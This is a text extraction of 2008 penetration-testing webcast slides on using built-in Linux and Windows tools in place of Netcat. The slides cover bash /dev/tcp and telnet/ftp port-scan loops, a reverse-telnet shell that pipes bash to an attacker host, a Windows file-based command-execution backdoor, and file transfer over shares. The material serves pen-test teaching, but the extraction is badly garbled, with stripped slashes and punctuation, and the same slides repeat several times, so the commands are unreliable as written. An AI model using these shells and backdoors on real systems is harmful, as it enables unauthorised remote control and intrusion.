Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 18
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 19
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 20
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
